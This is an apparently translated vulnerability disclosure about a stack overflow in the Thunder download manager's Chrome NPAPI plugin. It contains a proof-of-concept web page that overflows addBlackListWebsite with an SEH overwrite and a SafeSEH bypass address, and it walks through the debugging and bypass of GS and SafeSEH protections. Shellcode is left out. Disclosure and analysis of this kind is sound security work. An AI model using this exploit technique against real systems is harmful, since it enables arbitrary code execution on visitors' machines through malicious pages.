Thunder Chrome plug-in stack overflow can lead to arbitrary code execution
Thunder is Internet download software developed by the Thunder company, based on multi-resource hyper-threading technology.
When you download and install Thunder, the installer recommends that you also install browser extensions:
Thunder Download Extension (Chrome extension)
This Chrome extension has a stack overflow vulnerability: users who have the Thunder Chrome extension installed may have arbitrary code executed when they browse a malicious web page.
Thanks:
Test environment: Windows 2003, default configuration
Looking at the manifest.json of the Thunder Chrome extension, we find that the extension ships xl_chrome.dll as an NPAPI (Netscape Plugin Application Programming Interface) plugin with the public attribute set to true, so xl_chrome can be instantiated and called by any web page.
POC:
<embed type="application/xl_chrome_plugin" id="xl_chrome_plugin">
<script>
var plugin = document.getElementById("xl_chrome_plugin");
function exploit() {
    var i = 0;
    var exploit_string = '';
    var nop = '\x72\x00\x72\x00';            // jz next_code
    var safeseh_addr = '\x0b\x0b\x27\x00';   // call [ebp+30h]
    var jz_seh_addr = '\x74\x22\x74\x22';    // skip SEH
    while (i < 20012) { i += 1; exploit_string += 'a'; }
    exploit_string += jz_seh_addr;
    exploit_string += safeseh_addr;
    i = 0;
    while (i < 20000) { i += 1; exploit_string += '\x72\x00\x72\x00'; }   // nop
    plugin.addBlackListWebsite(exploit_string);
}
</script>
(Note: the wooyun page renders each slash as two.)
The stack overflow is in AddBlackListWebsite, implemented by xl_chrome (AddBlackListPage should have the same problem; the other methods were not tested).
Viewing the program's protections with mona:
Since SafeSEH is enabled, we need to bypass it, so we look for a SafeSEH bypass address.
Finally, 0x00270b0b is chosen as the jump address.
Command line:
chrome.exe --plugin-startup-dialog
Immunity Debugger is attached to the process id shown in Chrome's pop-up dialog. Chrome opens the POC page, F12 opens the console, and entering exploit() (the code is wrapped in a function to make debugging and editing easier) triggers a write exception.
I forgot to mention that because the program is compiled with GS, the only option is to overwrite the SEH record and trigger an exception so that execution enters the exception handler.
At that point the exception chain is overwritten with 0x00270B0B, the SafeSEH bypass address we selected, which finally returns to a location we control.
The rest is a matter of shellcode.
Solution:
Google has long said that NPAPI is about to be abandoned. Why does Thunder dare to keep using it?